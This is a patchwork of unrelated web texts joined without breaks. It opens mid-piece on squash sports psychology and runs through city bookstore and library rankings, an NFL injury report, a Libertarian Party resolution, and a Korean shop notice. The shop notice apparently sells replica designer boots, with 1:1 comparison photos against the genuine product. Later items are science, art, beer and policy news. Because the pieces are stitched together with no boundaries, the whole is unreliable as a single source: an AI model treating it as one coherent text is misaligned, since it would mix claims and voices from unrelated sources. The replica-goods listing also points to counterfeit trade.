You should always believe in yourself and believe you can achieve the impossible BUT if the best player in the world and possibly the best player of all time makes mistakes, how can you possibly expect to play the perfect shot every time? When these thoughts come into your head you have to rationalise them, as they are irrational thoughts. How can you possibly be perfect every time? It's irrational to think you can. Let us rationalise this irrational perfectionist feeling many of us have had once and for all.
Ramy Ashour
In the World Open Final of 2012, Ramy Ashour faced his Egyptian compatriot Mohamed El Shorbagy in a titanic final featuring one of the greatest and most watched rallies of all time.
Ashour is already widely regarded as one the best to have ever played the game and so far has won Three World Opens despite the fact he hasn't reached the age bracket that would be traditionally seen as the peak for an athlete. Yet in the first game he played awfully and was thumped by Shorbagy 11-2.
“Can you imagine? One of the biggest matches of your life and you've just lost the first game 11-2 and played some of the worst squash you've ever played. Ramy Ashour lost the first game 11-2. The world was watching and he was in the worst form of his life. Who went onto win the match and the World Title? Ramy Ashour.”
How easy it would've been for Ashour to spiral out of control and believe that it wasn't his day or that he just wan't playing well or in a good spell of form. If he had any limiting beliefs, he wouldn't have come back to win.
It's simple – simple to say that is – he let it go. He let his performance in the first game go, he didn't dwell on it. He spent time on court after the game refocusing and hitting a few balls and suddenly he started to grow into the match more and more.
Has your defeat in a rally or game been as bad as Ashour's was with the World Title at stake? Then why can't we take a leaf out of his book? If he could let it go in the most important match in the World Squash calendar (perhaps aside from the British Open), why can't we let a bad shot or a bad game in a league match or friendly against a teammate go?
In spite of it all, you are still human. You aren't a PlayStation character and so how can you expect to hit every shot perfectly? If Ramy Ashour can't do it every time, can you seriously expect to do it every time?
Sure, you should always aim high and aim to play every shot to the best of your ability but don't beat yourself up when you don't reach dizzy heights with every ball you touch.
You can create a new rational belief for your mind from this which might be ‘If Ramy Ashour can't do it every time, can I seriously expect to do it every time?' or ‘I'm only human.'
How do you feel now? Next time you are feeling particularly picky with your game on court, think about all that we've discussed here. You are human and nobody gets it right every time.
Rationalise those irrational thoughts by questioning them and creating a new rational belief to replace them, such as ‘I'm only human' or ‘I will work hard to make the next shot better'.
‘I'm not hitting very good drops today.'
Here's another irrational thought and limiting belief. It often comes about after a player hits a couple bad shots, in this example drops, although it could be serving, boasting or any other shot you care to mention.
If you think this, the chances are you will end up being right. Once you decide you aren't dropping well, you will start to become apprehensive about playing drops. You might continue to force yourself to play them regularly or you might even start avoiding them and only hitting them nervously when you know a drop is overwhelmingly the right choice of shot. It goes without saying that forcing shots or playing them nervously are not effective ways to set about improving a shot's success rate.
There is more often than not also a bit of selective thinking going on in these cases. We often gloss over victories where we think we played very well, forgetting that in these matches we also hit some bad drop shots or a few down but because we won the game and felt good in general, we tend to forget or not focus on these shots as much. It's a bit like how we focus on a train being late. “That train's always late! It's the second time this month!” Of course, we neglect to think about the fact that the train was on time the other twenty-eight days of that month. We tend to build a picture around what we want to see and this can be the case with sport. We play very well one day and therefore overlook the bad parts of that match but then another time, perhaps when we are not in such a good mood, we play some bad shots, perhaps fewer even than in the so-called good performance and suddenly we allow ourselves to believe this has been an exceptionally bad game.
As if it wasn't enough that our mind is being selective, our brain neurons can also go against us if we draw negative attention to a shot or action. What usually happens is that you take conscious control and start thinking too much about how to play the shot, which is the exact opposite of what you want to do. Taking conscious control of an action slows it down and reduces the effectiveness of the automatic process that takes place in your neurons and nervous system when you execute a shot.
When you play a shot, you don't think about how you do it and yet for some reason we try to think about how to play a shot when a couple of them don't match our expectations.
Perhaps you did hit two bad drops in a row. Perhaps you hit five in succession that didn't feel right. So what? How many hundreds or thousands of drop shots have you hit in your life? How many hundreds or thousands of good drop shots have you hit? Have you forgotten all of those? You are human so not every drop shot will be perfect or even satisfactory. You are always due a bad shot or two, such is our nature. So why do you use one or two examples to make such a sweeping statement?
Remind yourself of all the good drops you've played and shrug off these missed ones as simple anomalies, which is what they usually are (unless you need major technical work – you'll know if you do as you'll persistently make a lot of errors). Once more, not every shot can be perfect so let these bad examples go and focus on the next shot, as the only thing you can change is the next shot.
On this occasion, your new rational thought might be; ‘I've hit plenty of effective drops, these were just one or two lapses, which everyone has. I'll do my best to make my next shot better.'
Or, if you can remember a time you played great drops, even better: ‘I remember that game vs. Geoff in the leagues where I hit so many great drops. Everything I touched seemed to come off. Clearly, I can hit good drops, these were just a couple of exceptions as not everyone can be perfect. The next few will be better than these.'
I promise you that if you allow irrational thoughts such as these to persist, they will become self-fulfilling prophecies. As Henry Ford once said; ‘Whether you think you can or you think you can't, you're right.'
Other limiting beliefs and irrational thoughts include:
‘I'm not playing well at the moment/today/this evening'
‘I'm not as good as my opponent.'
‘It's not my day.'
Whenever you have a negative thought like this enter your mind, take a second to rationalise and actually consider how preposterous the thought sounds. Then form a new belief or sentence in your head focused on the future.
Once you have done this once or twice, you will remember the feeling of rationalising the thought and you can actually activate or call upon this feeling in a matter of seconds between rallies to calm yourself and rid your mind of any limiting beliefs without thinking about it.
Take 2 minutes of your life now to write down some of the limiting beliefs you've had before. Proceed to pick them apart and once you've revealed them for what they are – irrational thoughts – and then complete the rationalization by writing down a new belief using the system below.
The System for dealing with irrational, limiting beliefs:
Bibliography
Much of what I have written is a mixture of the thoughts of many people. Some of it is my own thought but much of it I have learned from the works of others. All of these various sources of knowledge have now become indistinguishable from one another and so it is no longer possible to cite each and every point and its origin.
I do not claim that any of the above is my own work but the coming together of the works of many which I have simply bound together and intertwined with my own thoughts and experience.
The following titles are just some of the sources which have influenced and provided knowledge for different parts of this section:
Cohn, Dr. Patrick. “Sports Psychology for Athletes, Parents, Coaches | Coaching, Books, CDs.” Sports Psychology for Athletes, Parents, Coaches | Coaching, Books, CDs.
Gallwey, W. Timothy. The Inner Game of Tennis. New York: Random House, 1974. Print.
Lefkovits, John, David R. McDuff, and Emily A. Cardy. “Training Manual for Diving.” Training Manual for Diving (n.d.) http://www.mdsports.net/docs/mentalskills_diving.pdf
Matthew, Nick. Sweating Blood: My Life in Squash. N.p.: InternationalSPORTgroup, 2013. Print.
Syed, Matthew. Bounce: The Myth of Talent and the Power of Practice. New York: Harper, 2010. Print.
Nic Davies
The streets of Edinburgh and Hong Kong are overflowing with books. Istanbul and Singapore, less so.
Every year the World Cities Culture Forum collects information on how people consume culture around the world. The organization looks at factors like how many video game arcades a city has, or how much a city forks over for movie tickets each year. Led by the London mayor's office and organized by UK consulting company Bop, the forum asks its partner cities to self-report on cultural institutions and consumption, including where people can get books.
Over the past two years, 18 cities have reported how many bookstores they have, and 20 have reported on their public libraries.
Hong Kong leads the pack with 21 bookshops per 100,000 people, though last time Buenos Aires sent in its count, in 2013, it was the leader, with 25. New York does OK, with around 840 bookstores for 8.4 million people, but London, whose population is only slightly bigger than New York, counts only 360 stores.
rank city bookstores per 100,000 people date 1 Hong Kong 21 2014 2 Taipei 17.6 2014 3 Madrid 16 2014 4 Shanghai 16 2014 5 Toronto 13.9 2015 6 New York 10 2015 7 Sydney 9.4 2015 8 Paris 9 2015 9 Seoul 9 2015 10 Austin 8.2 2015 11 Melbourne 8 2015 12 Shenzhen 6.6 2014 13 Amsterdam 6 2014 14 Moscow 5 2014 15 London 4 2015 16 Stockholm 3.2 2014 17 Singapore 3 2014 18 Istanbul 1 2015
When it comes to libraries per capita, Edinburgh leads by quite a bit: The city reported 60 libraries for every 100,000 people. Even going back more than two years, to include cities with older data, Edinburg blew everywhere else out of the water. It has around 300 libraries total, in a city of half a million. By comparison, Hong Kong has around 300 libraries for 7 million people.
Of the cities that reported their library counts, Dubai and Istanbul lagged.
rank city libraries per 100,000 people date 1 Edinburgh 60.5 2015 2 Warsaw 11.4 2014 3 Brussels 10 2015 4 Paris 9.2 2014 5 Seoul 6 2014 6 Shenzhen 5.9 2014 7 Vienna 5.9 2014 8 Hong Kong 4.2 2015 9 London 4.2 2014 10 Moscow 4.2 2014 11 Toronto 3.9 2015 12 Melbourne 3.4 2015 13 Amsterdam 3.3 2014 14 Sydney 3.3 2015 15 New York 2.7 2015 16 Taipei 1.8 2014 17 Rome 0.8 2014 18 Singapore 0.5 2014 19 Istanbul 0.4 2014 20 Dubai 0.3 2015
Since cities self-report their data, there's no way to enforce uniform definitions for what constitutes a bookstore. Drug stores in the US sell books, for example, as do stationery stores elsewhere, and data from New York comes from the Yellow Pages. Says Yvonne Lo, a coordinator at the forum, ”We very much rely on the city to update the data and provide us the data.”
LONDON -- Minnesota Vikings wide receiver Stefon Diggs, who has missed two games with a groin injury, is confident he'll be able to return to action Sunday.
The Vikings, who lead the NFC North at 5-2 and are looking for their fourth consecutive win, arrived early Thursday in London ahead of their clash with the Cleveland Browns at Twickenham Stadium for the NFL's fourth and final game in the UK this season.
"It's exciting to come back [to the UK]," said Diggs, who visited the country over the summer. "It's going to be a busy trip, but I can't wait to play some football out here.
"I feel good. We've got a little bit of time left, so I'll be ready to go."
Diggs was listed as a full practice participant Thursday after limited participation on Wednesday.
Stefon Diggs didn't mind the unusual practice conditions that the Vikings encountered Thursday at Syon House in Hyde Park. Said Diggs: "All we need is the grass and a couple of lines." AP Photo/Matt Dunham
The 23-year-old Diggs, who has a team-leading four touchdown receptions this season, missed the Vikings' victories over the Baltimore Ravens and Green Bay Packers.
When asked whether he had received any indication whether he would be ready to face the Browns, Diggs replied: "I'm the indication -- we'll see [Friday].
"At the end of the day you'll have to ask [coach Mike] Zimmer -- I was confident [of playing] last week, so I guess we'll see."
Editor's Picks Browns aren't thrilled about long flight, traveling to London to play Vikings The long flight, time change and disruption in their routines make the NFL's initiative in London mostly a drag, Cleveland players say.
With the historic Syon House on one side and a herd of cows on the other, the former fifth-round draft pick out of Maryland seemed unfazed by his surroundings as he spoke beside the crudely marked patch of grass on which the Vikings had been doing walk-through practices.
"I try not to pay too much attention to the surroundings when you've got plays to worry about," Diggs said. "It doesn't really matter. All we need is the grass and a couple of lines. We'll make it work and execute no matter what. At the end of the day, that's football."
Diggs also expressed his happiness to see quarterback Teddy Bridgewater, who also practiced Thursday after recovering from a horrific knee injury that has kept him out for 14 months.
"It's good," Diggs said. "I haven't thrown with him yet, so it's a little different. But his aura and what he brings to the game as a person and a teammate is definitely huge.
"Teddy's going to be Teddy. He's always going to be the same person no matter what."
Pete Rohrman
2017 Libertarian for Gov (NJ)
Infantry Platoon Sergeant
Marine Corps
May 31, 2017
Today the Libertarian National Committee passed the following resolution pertaining to U.S. military policy and the importance of present and former military personnel in the party's membership:
“Whereas, We support the maintenance of a sufficient military to defend the United States against aggression and believe that the United States should both avoid entangling alliances and abandon its attempts to act as policeman for the world;
“Whereas, We oppose any form of compulsory national service and recognize that many members of the military were unjustly conscripted in the past;
“Whereas, Most voluntary members of the military joined with the idea and/or goal of defending the United States and, thereby, their property, families, and friends;
“Whereas, The United States Military-Industrial-Complex has used many well-meaning military service members for purposes other than defense against aggression and further involved them in foreign entanglements during attempts to act as the world's policeman; and
“Whereas, Many current and former military service members are able to relate, identify, and speak out on the ways in which the United States military mission has been expanded and corrupted beyond a legitimate role of defense against aggression; now, therefore, be it;
“Resolved, Present and former members of the military who give such unique and powerful voice to the libertarian principles of peace and the non-initiation of force add great value to the Libertarian Party, and are welcomed as a vital part of our membership.”
==================================================================================================
2019.2월22일 < 오더일정 안내 >
● 오더일정 ●
2월22일 PM:20:00 [ 오더시작 ]
2월28일 PM:12:00 [ 오더마감 ]
이번 2월 2차 오더는 , 2월22일 시작 하여 , 2월28일 종료 되어질 예정입니다.
모든 주문 상품은 , 주문/입금 하신 날짜로 제작기간 < 평일기준 > 10일 ~ 14일 이후 수령합니다.
==================================================================================================
◎ 주문시 숙지사항 ◎
* 저희 엘레갈로 에서 판매되는 모든 상품은 , 오더메이드 방식으로 주문이 이루어집니다.
* 주문한 상품은 제작기간 10일 ~ 14일 이후 상품을 수령하실수 있으며 , 제작기간 은 평일기준 10일 ~ 14일 입니다.
* 제작기간 10일 ~ 14일 ( 토요일 , 일요일 , 국가 공휴일 ) 등은 미 포함 하여 제작기간이 반영되어집니다.
* 장난구매 , 미입금 내역 , 주문취소 , 환불 내역이 현저히 많은 회원은 제재 대상이 되므로 이점 숙지바랍니다.
=========================================================================================================================================
2018.7.20 < 제작과정 관련 >
아래의 링크를 클릭하시면 제작 관련 전반적인 내용을 열람하실수있습니다.
http://ca4ra.co.kr/product/detail.html?product_no=2443&cate_no=1&display_group=2
=======================================================================================================================
- 사이즈 팁 -
245 = 26.5cm
250 = 27.0cm
255 = 27.5cm
260 = 28.0cm
265 = 28.5cm
270 = 29.0cm
275 = 29.5cm
280 = 30.0cm
285 = 30.5cm
운영자 발사이즈 265 / 해당 상품 착용 사이즈 정치수 265 착용
발볼이 넓거나 , 발등이 있으신 분은 반드시 반치수 업 하셔야 합니다!
해당 상품의 경우 발목 부분이 상당히 좁게 나온 디자인 입니다. 생로랑 스타일을 전반적으로 추구하시고
좋아하시는 분들이라면 , 왜? 발목 부분이 좁게 나왔는지 이해가 되실것입니다.
보통 생로랑 에서 나오는 스키니 류 의 하의 데님은 밑단 넓이가 15.5 바스 정도 로 나오는데
만약 , 부츠류 가 바지 밑단 넓이 보다 넓어져 버리면 , 바지핏 뿐만 아니라 , 전체적인 스타일링 을 망치게 됩니다.
생로랑 스타일을 지향하시고 , 슬림핏을 좋아하시는 분들이라면 , 100% 만족하실수있는 핏이지만
반대로 , 보테가 베네타 제품과 같이 , 발목 부분이 넓게 나오는 디자인을 선호하시는 분들이라면 해당 모델은 가급적 구매를 삼가해주시길 바랍니다.
===============================================================================================================
2018.7.20 < 1:1 비교사진 업데이트 >
저희 엘레갈로샵 에서 제작된 상품은 17F/W 센스 직구 상품 으로 제작이 되었으며
1:1 비교사진 에 촬영된 상품은 , 착용감 이 많은 중고 상품으로 촬영이 되었습니다.
두제품 모두 굽높이 는 4센티 버젼으로 / 정규품 은 아웃솔 보강으로 인해 , 뒷굽의 높이가 정규품 보다
약 2미리~ 3미리 높아 보이나 , 굽 보강으로 인한 차이 이오니 참고하시어 비교사진을 봐주시길 바랍니다.
비교 사진 또는 제자과정 의 사진은 최대한 있는 그대로 를 보여드리기 위해
보정을 아예 하지 않습니다!!!
===============================================================================================================
2018.7.20 < 공지사항 >
- 촬영 관련 -
제작상품 업그레이드 관련하여 , 상품 촬영이 다시 진행되었습니다.
아래의 상품은 , 실제 여러분들이 주문후 받아보시는 상품이며 , 정규품 사진 촬영이 아닌 저희 자체제작 상품 사진입니다.
" 간혹 제작상품 이미지 는 어디있냐고 물어오시는 분들이 있어서 말씀을 드립니다. "
착오 없으시길 바랍니다.
(Image: Incredible Features/Barcroft Media)
We know the oceans are warming. We know they are acidifying. And now, to cap it all, it turns out they are suffocating, too. A new health check on the state of the oceans warns that they will have lost as much as 7 per cent of their oxygen by the end of the century.
The cascade of chemical and biological changes now under way could see coral reefs irreversibly destroyed in 50 to 100 years, with marine ecosystems increasingly taken over by jellyfish and toxic algal blooms.
The review is a repeat of a study two years ago by the International Programme on the State of the Ocean (IPSO), a coalition of scientists. It concludes that things have become worse since the first study.
Advertisement
“The health of the oceans is spiralling downwards far more rapidly than we had thought, exposing organisms to intolerable and unpredictable evolutionary pressure,” says Alex Rogers at the University of Oxford, the scientific director of IPSO.
Deadly trio
Rogers describes a “deadly trio” of linked global threats. The first is global warming: surface seawater has been warming almost as fast as the atmosphere. The second is acidification – a result of the water absorbing ever more CO 2 from the atmosphere. The third is deoxygenation.
We learned last year that acidification is beginning to affect marine creatures – snail shells in the Southern Ocean are dissolving. But John Spicer of Plymouth University, UK, says “in the lab, low oxygen has a greater effect than acidification”.
The oceans are losing oxygen partly because warmer water holds less oxygen, and partly because warming is greatest at the surface, creating a buoyant surface layer that mixes less with colder layers below. This creates oxygen-poor deep water that could suffocate life on the seabed, the authors warn.
Near some coasts that deep, deoxygenated water can still return to the surface, though, carried by upwelling currents, says Rogers. This could kill marine life in shallow water too. In fact, the report blames oxygen-poor water brought to the surface by the California Current for a massive loss of marine life off North America in the past decade. “This region showed no evidence of hypoxia [low oxygen levels] prior to 2000,” it says.
Ocean deserts
Meanwhile, tagging studies have shown that large fish like marlin, which need a lot of oxygen to fuel their fast metabolisms, are disappearing from some of the areas in the tropical oceans where oxygen is diminishing.
Ralph Keeling of the Scripps Institution of Oceanography in La Jolla, California, predicts using ocean models that the oceans will lose between 1 and 7 per cent of their oxygen this century.
“Low oxygen levels have occurred in previous eras when there were mass extinctions, and now we are seeing signs of a repeat,” says Rogers.
Some oceanographers say the report's claims of rapid recent ocean deterioration are exaggerated. “To say things are dramatically worse than two years ago is hype,” says Callum Roberts of the University of York, UK. But he agrees that the threat from the deadly trio is real. “The ocean deserts are expanding. We have a squeeze on ocean productivity that will reduce fisheries' potential in the coming decades if we don't reduce CO 2 emissions,” Roberts says.
Image caption Enormous underground detectors are needed to catch neutrinos, that are so elusive as to be dubbed "ghost particles"
A meeting at Cern, the world's largest physics lab, has addressed results that suggest subatomic particles have gone faster than the speed of light.
The team has published its work so other scientists can determine if the approach contains any mistakes.
If it does not, one of the pillars of modern science may come tumbling down.
Antonio Ereditato added "words of caution" to his Cern presentation because of the "potentially great impact on physics" of the result.
The speed of light is widely held to be the Universe's ultimate speed limit, and much of modern physics - as laid out in part by Albert Einstein in his theory of special relativity - depends on the idea that nothing can exceed it.
We want to be helped by the community in understanding our crazy result - because it is crazy Antonio Ereditato, Opera collaboration Light speed: Flying into fantasy
Thousands of experiments have been undertaken to measure it ever more precisely, and no result has ever spotted a particle breaking the limit.
"We tried to find all possible explanations for this," the report's author Antonio Ereditato of the Opera collaboration told BBC News on Thursday evening.
"We wanted to find a mistake - trivial mistakes, more complicated mistakes, or nasty effects - and we didn't.
"When you don't find anything, then you say 'well, now I'm forced to go out and ask the community to scrutinise this'."
Friday's meeting was designed to begin this process, with hopes that other scientists will find inconsistencies in the measurements and, hopefully, repeat the experiment elsewhere.
"Despite the large [statistical] significance of this measurement that you have seen and the stability of the analysis, since it has a potentially great impact on physics, this motivates the continuation of our studies in order to find still-unknown systematic effects," Dr Ereditato told the meeting.
"We look forward to independent measurement from other experiments."
Neutrinos come in a number of types, and have recently been seen to switch spontaneously from one type to another.
The Cern team prepares a beam of just one type, muon neutrinos, and sends them through the Earth to an underground laboratory at Gran Sasso in Italy to see how many show up as a different type, tau neutrinos.
In the course of doing the experiments, the researchers noticed that the particles showed up 60 billionths of a second earlier than they would have done if they had travelled at the speed of light.
This is a tiny fractional change - just 20 parts in a million - but one that occurs consistently.
The team measured the travel times of neutrino bunches some 16,000 times, and have reached a level of statistical significance that in scientific circles would count as a formal discovery.
Media playback is unsupported on your device Media caption Professor Antonio Ereditato of Cern: "An understatement that these are unexpected results"
But the group understands that what are known as "systematic errors" could easily make an erroneous result look like a breaking of the ultimate speed limit.
That has motivated them to publish their measurements.
"My dream would be that another, independent experiment finds the same thing - then I would be relieved," Dr Ereditato told BBC News.
But for now, he explained, "we are not claiming things, we want just to be helped by the community in understanding our crazy result - because it is crazy".
June 11, "You Are Getting Very, Very Sleepy Photo: Klari Reis June 17, "Leaving the Nest" Photo: Klari Reis February 7, "Paris Hilton" Photo: Klari Reis March 2, "Underwater Pen Marks" Photo: Klari Reis February 5, "Octopus Kisses" March 25, "My Little Pony Swirl" Photo: Klari Reis April 29, "A Sun In Blue Space" Photo: Klari Reis May 19, "Paltrow In Contagion" Photo: Klari Reis June 6, "Jellyfish With Candy" Photo: Klari Reis July 7, "My Friend Nico" Photo: Klari Reis September 5, "Sprinkled On Marble" Photo: Klari Reis July 14, "Strawberries and Cream" Photo: Klari Reis July 25, "Snowballs Resting on a Vibrant Plateau" Photo: Klari Reis August 29, "Blurred Lines" Photo: Klari Reis July 18, "Vortex Pimples" Photo: Klari Reis July 9, "The Purple People Eater" Photo: Klari Reis
For all the strange things artists have turned into canvasses, Klari Reis manages to stand apart. Since 2009, she's been perfecting the art of painting in petri dishes.
Reis is currently nine months into "The Daily Dish," an on-going series that has her making a new three-inch artwork every single day of 2013. All the images have the same sort of look–blobs, swirls, and whorls of color that could either be a really beautiful thing seen through a microscope or a really beautiful thing seen through the Hubble space telescope. Still, as with those biological and celestial wonders, no two are exactly alike. "Sprinkled on Marble," the painting for September 5, looks like a fantastic array of mold. "Blurred Lines," from August 23, looks like some spilled milk viewed through a kaleidoscope. "Snowballs Resting on a Vibrant Plateau," from July 25, looks, well, like just that.
This isn't Reis's first stab at daily dishing; she created a new petri dish painting for every day of 2009 as well. And at this point, she's figured out many of the quirks of her unique medium. When she first started working with epoxy polymer, the substance in which her paints float, in 2003, "there were a lot of unknowns," she says. "I'd leave a project, and then the next day it would look completely different." These days, she works with three different types of epoxy, all industrial plastics typically used for flooring, but each with its own drying time. Every petri painting has between three and five layers. Temperature and humidity are essential to the final look, so Reis works with multiple heaters in the room to ensure the space stays between 70 and 80 degrees. She often uses a blow torch and a hair dryer to tease out certain effects. "It is hard to put into words," she explains. "My studio becomes very much a science lab."
Typically, Reis exhibits the tiny works in clusters of 30, 60, or 150 paintings. But that doesn't mean she doesn't give her full attention to every petri dish, every day. "I make each piece to be strong enough compositionally to stand on its own."
One might best describe Asheville, NC's Wicked Weed as “the brewery that most breweries want to be in 2014.” They're emblematic of everything that's hot, everything that's come into favor in American craft brewing, from old standbys like a hoppy, West Coast DIPA to the bracingly tart, complex American wild ales that have been getting so much attention in large brewing competitions for the last few years. The brewery has the medals to prove it: Wicked Weed is inherently “now.”
And no aspect of the brewery is more “now” than their Funkatorium, the facility they've dedicated exclusively to barrel-aged beers in their “From the Wood” and “From the Funkatorium” series. Within the confines of these walls, the brewers of Wicked Weed are tackling some true mad scientist shtick, blending and infusing their beers with flavor combinations that until that moment, only existed within the realm of some bearded brewmaster's fever dream. Each beer's ingredient list reads like something thrown together by an overambitious homebrewer with no expectation of success—Oh, so it's a soured, gin barrel saison? With blackberries? And basil? ...and spices? Well, alright then, sure. Good luck with that. And that's not even some brewpub exclusive—Wicked Weed is selling stuff like this commercially.
To put it simply, this is a brewery that has worked its way into rarified territory in a very short amount of time. On the East Coast, they're now mentioned right alongside the likes of Cigar City, Hill Farmstead or Westbrook. Their esteem in the industry is apparent as well—one need look no further than the fact that New Belgium, the fourth largest craft brewer in the country, wanted to collaborate with such a small North Carolina upstart. Such a size differential in collaborations is almost unheard-of, but Wicked Weed is the kind of brewery one makes exceptions for.
And so, when Paste was able to acquire a full set of six new releases from Wicked Weed, we thought it was a worthy occasion for a mini-tasting that would highlight the variety of imaginative brews being born in the heart of the Funkatorium. Together with Editor Josh Jackson and Nick Purdy of Avondale's Wild Heaven Craft Beers, I sat on a back porch in the unseasonably warm November weather, expectations high and notebook in hand.
TakeTake New Zealand Hopped Brett Saison
Our first beer was immediately the most subtle I've had from Wicked Weed, a brettanomyces saison hopped with a blend of fruity New Zealand hops, including Pacific Gem, Pacific Jade, Wakatua and the currently buzzy Nelson Sauvin. You can still tell it's a saison you're drinking, with a classic, lightly funky background of hay and spices, but it's much more hop-forward than it is tart. In fact, any sourness here is decidedly working in the background, taking a backstage to lightly fruity hop flavors of green grape and passionfruit. Very easy drinking stuff, and super refreshing, feeling quite a bit lighter than its 7.5% ABV.
Genesis Blonde Sour
This is the kind of beer people are now thinking of when they hear the words “Wicked Weed.” A blonde sour brewed with the house blend of yeast and souring bacteria, it's made with “more than 200 lbs of mango, papaya, guava and pineapple and aged for 6-12 months in white wine barrels.” Unsurprisingly, a lot of those influences come out to play on the palate, particularly the barrel character. The Genesis features a good shock of tartness on a light, effervescent body, followed by an explosion of fruity white wine flavors. Drinking it is a bit like indulging in the fruitiest, juiciest pinot grigio or sauvignon blanc you've ever sampled. Paste editor Josh Jackson named this his top beer of the tasting, thanks to its intense flavors.
Briars and Brett
The most divisive and unusual beer of the tasting, Briars and Brett seems to be built on a farmhouse ale base, but that's where any of the usual comparisons end. Aged in a gin barrel and featuring fresh blackberries and basil, it's all about the aromatics and botanicals. Unfortunately, the basil comes through shockingly strong on the nose, with a blast of spicy herbal aromatics. That intensity made us slightly hesitant to taste, but the flavors are significantly more balanced. Here, the blackberries do come through, along with loads of juniper and gin botanicals. It's a beer sporting a definite cocktail inspiration, and it's tough not to be reminded of a gin and tonic mixed with blackberry puree and a fistful of fresh basil. All in all, it doesn't make for the most drinkable beer of the tasting, but it was hardly meant to be. Some of the tasters present couldn't quite get around the basil, while others grew to enjoy it over time. Personally, I remained neutral to it: This ale is a little too heavy on its herbal flavor components for it to become one of my favorites.
Tributary Imperial Brett Saison
The aforementioned collaboration with New Belgium is an imperial saison at 8.8% ABV, brewed with sugar beets, although it's not entirely clear how they were incorporated into the brew. This is a bit of an unusual product, as one rarely sees a traditional saison brewed to this strength, and the results are a bit conflicted. The aroma combines some of the classic barnyard funkiness with an earthy/musty note. It's flavor where this beer really stands apart in an unusual way, though, being much sweeter than your classic dry saison, due both to the higher gravity and inclusion of the beets. There's a red fruit flavor in particular that is reminiscent of cherry, an odd note to pick up in a saison for sure, but that may be the beets at work. I feel like of the six beers that we tasted, this was the one to make the least powerful impression overall.
Lusus Naturae Brett Wild DIPA
Now we're talking. A hugely flavorful double India pale ale, Lusus Naturae keeps things fairly simple by delivering an intensely hoppy West Coast ale with an only mildly funky backbone. Hops naturally rule the day here, and in terms of character it's almost reminiscent of a bigger brother to the early TakeTake, less refreshing but more decadent. Certainly more of a classic American DIPA than it is a funky brew, but nonetheless a solid example of the style.
Dark Arts Bourbon Barrel Wild Imperial Stout
Here it is, the first commercially brewed beer to reach North Carolina's 15% ABV maximum alcohol cap, and boy is it a doozy. It smells like a brownie covered in cherry compote and chocolate syrup, a decadent beer-lovers dream. On first taste, it's clear that there's a simply great imperial stout under all of the other accoutrements, but combined with its barrel character and a tang of sourness, it becomes something truly unique. The bourbon barrels thankfully impart a restrained character that add more notes of caramel and vanilla without taking over completely. In fact, “fruity” is probably the dominant flavor component, as dark fruit flavors are enhanced and given an acidic edge by its tartness. Despite this, it's also not cloyingly sweet, making it one of the more “drinkable” 15% ABV beers that I could imagine. Although if you're planning on consuming an entire 500 ml bottle of Dark Arts on your own, you may want to do it in the confines of your own home. That should give you plenty of time to admire the awesome label.
Imposing!
(CNN) -- Sick of slow Internet connections? The federal government hears you.
The U.S. Federal Communications Commission on Monday unveiled some details of its broadband plan, which aims to speed up Web connections and make high-speed Internet available to more Americans.
The commission plans to use educational programs and an expansion of broadband Internet infrastructure to give 90 percent of Americans high-speed Internet access at home by 2020.
Currently, only 65 percent of Americans have high-speed Internet access at home, which the FCC says is a detriment to economic growth. The proposal will make the U.S. "the world's largest market of high-speed broadband users" and will create jobs, the FCC says in a news release.
The plan would also lower health care costs and improve home energy efficiency by making information available digitally, the FCC says.
Other details of the plan remain unclear. The FCC will release its entire proposal at a meeting Tuesday.
The FCC also wants to speed up overall connections, which are often criticized as slow by global standards.
Its goal is to give 100 million households access to Internet connections that transfer 100 megabits of data per second.
The average U.S. Internet speed today is much slower -- only 3.9 megabits per second, according to the Internet monitor Akamai.
The U.S. has only the 18th fastest Internet connections in the world, behind countries like South Korea, which leads the world with 14.6 megabit-per-second data transfer rates, Akamai says.
One rural town's broadband battle
Each community in America also will get access to at least one "ultra-high-speed" connection at a library, school or military base. Those connections will reach speeds of 1 gigabit per second, the FCC said in the news release.
The country's broadband plan was required as part of President Obama's 2009 American Recovery and Reinvestment Act, which allocated $7.2 billion to broadband-related initiatives.
The FCC's upcoming broadband plan will be "revenue neutral," according to an executive summary of the plan released Monday. The FCC will auction off 500 megahertz of spectrum to pay for some expenses, such as extending broadband networks to rural areas.
Other programs will be paid for with improved efficiencies, the FCC said.
The plan has been delayed, and it is criticized by some as doing too little.
Speaking at South by Southwest Interactive, a technology conference in Austin, Texas, Derek Turner, the research director for the nonprofit group Free Press, said the broadband plan does not do enough to reduce the cost of high-speed Internet connections, which he said is the biggest barrier to adoption.
Still, he said, he is hopeful that the federal government can address the issue.
"I'm actually very hopeful for some positive outcomes," he said at the conference, "because I've seen stranger things happen in Washington."
FCC Chairman Julius Genachowski framed the plan as a boost for the economy.
"The National Broadband Plan is a 21st century roadmap to spur economic growth and investment, create jobs, educate our children, protect our citizens, and engage in our democracy," he said in an FCC news release.
"It's an action plan, and action is necessary to meet the challenges of global competitiveness, and harness the power of broadband to help address so many vital national issues."
The plan places some emphasis on the mobile Internet and indicates that the U.S. wants to be a leader in that emerging space.
CNN's Doug Gross contributed to this report.
The Milky Way is back! Every year from April through August, we in the northern hemisphere are granted a glimpse deep into the heart of our home galaxy. During the remaining months of November through March, the Core of the Milky Way (at right, above) lies below our horizon during the night, and out of view.
During this early period of the galaxy's rise, it only reveals itself very late at night, and as the months progress through August, it will avail itself progressively earlier throughout the evening. This means capturing images in the earlier part of the year requires long, dark, often cold nights in remote locations far removed from the terrible light pollution generated by populated areas.
Over the past six years I have dedicated countless hundreds of hours both in the field and in front of the monitor learning the techniques, technology, and post-processing to produce high quality astrophotography. Now, with some new equipment at my disposal, I am finally beginning to produce images that I can be truly proud of.
Image caption New polytechnics are needed to help redress skill shortages in industry, a report argues
The government should revive the term 'polytechnic' argues a report into the future of higher education in England.
Large further education colleges which already have degree awarding powers should be eligible to apply for polytechnic status say the authors.
The title would be a "mark of vocational excellence" argues the Commission on the Future of Higher Education.
A government spokesman said the report included "much food for thought".
The commission was set up by the Institute of Public Policy Research think-tank a year ago.
Nigel Thrift, chairman of the commission and Vice-Chancellor of Warwick University said the revival of polytechnics "would signal that the university title and the university route are not the only form of high status in our system".
The government opened 30 polytechnics in the 1960s "in an attempt to ensure working-class communities benefited" from the expansion of higher education, say the authors.
'Role lost'
Unlike universities "polytechnics tended to serve their local communities and offered more vocational-oriented qualifications, accredited by professional bodies".
But by the early 1990s changes to the labour market meant academic qualifications were seen as the best route to a good job, says the study.
So in 1992 the government turned the polytechnics into 'new universities'. Now almost half of school leavers go to university. The downside, according to the report, was that a "distinctive role for higher vocational learning was arguably lost".
